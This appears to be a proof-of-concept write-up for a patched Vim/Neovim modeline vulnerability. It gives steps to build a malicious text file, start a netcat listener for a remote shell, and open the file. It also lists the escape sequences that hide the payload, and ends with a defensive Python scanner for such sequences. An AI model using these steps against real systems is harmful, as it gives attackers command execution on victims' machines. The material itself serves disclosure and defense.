This CVE was fixed after Neovim 0.3.6 and Vim 8.1.1365.
vim demo1.txt
- Create the malicious text file:
gcc make_demo3.c -o make_demo3
./make_demo3
- Start a listener in another session:
nc -vlp 9999
- Open the malicious file:
vim demo3.txt
You can then execute any Linux command in that session.
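\x1b[?7l
: Do not wrap when output reaches the end of the line; keep overwriting the last character
\x1bS
: STS, Set transmit state
\x1b[1G
: Move to column 1
\x1b[K
: Erase all characters from the current cursor position to the end of the line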
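
The sequences above move the cursor back and erase text a terminal has already printed, so what is displayed can differ from what the file contains. As an added example (not part of this repository; the function names and the sample bytes are assumptions constructed for illustration), this Python scanner reports every escape sequence in a file and renders the bytes so nothing is hidden:

```python
import re

# The four sequences listed above, with the meanings given there.
KNOWN = {
    b"\x1b[?7l": "disable auto-wrap (overwrite last column)",
    b"\x1bS": "STS, set transmit state",
    b"\x1b[1G": "move cursor to column 1",
    b"\x1b[K": "erase from cursor to end of line",
}

# ECMA-48 shapes: CSI is ESC [ + parameter bytes 0x30-0x3F + intermediate
# bytes 0x20-0x2F + one final byte 0x40-0x7E; otherwise ESC + one byte
# 0x40-0x5F. A lone ESC with nothing valid after it is matched as well.
ESC_RE = re.compile(rb"\x1b(?:\[[0-?]*[ -/]*[@-~]|[@-_])?")


def scan(data: bytes):
    """Return (line, column, raw_sequence, meaning) for each escape sequence."""
    findings = []
    for line_no, line in enumerate(data.split(b"\n"), start=1):
        for m in ESC_RE.finditer(line):
            seq = m.group(0)
            meaning = KNOWN.get(seq, "other escape sequence")
            findings.append((line_no, m.start() + 1, seq, meaning))
    return findings


def make_visible(data: bytes) -> str:
    """Render bytes so a terminal cannot act on them: controls become \\xNN."""
    return "".join(
        chr(b) if b == 0x0A or 0x20 <= b < 0x7F else f"\\x{b:02x}" for b in data
    )


# Constructed sample (assumption, not the repository's demo file): line 2
# prints text, then uses the listed sequences to wipe it before the decoy.
SAMPLE = (
    b"ordinary first line\n"
    b"HIDDEN-TEXT\x1b[?7l\x1bS\x1b[1G\x1b[Kharmless looking line\n"
)

if __name__ == "__main__":
    for line_no, col, seq, meaning in scan(SAMPLE):
        print(f"line {line_no} col {col}: {make_visible(seq)} -> {meaning}")
    print(make_visible(SAMPLE), end="")
```

Running `scan` on a file before opening or printing it shows which lines carry control sequences; any hit in a file that is supposed to be plain text deserves a look at the `make_visible` output.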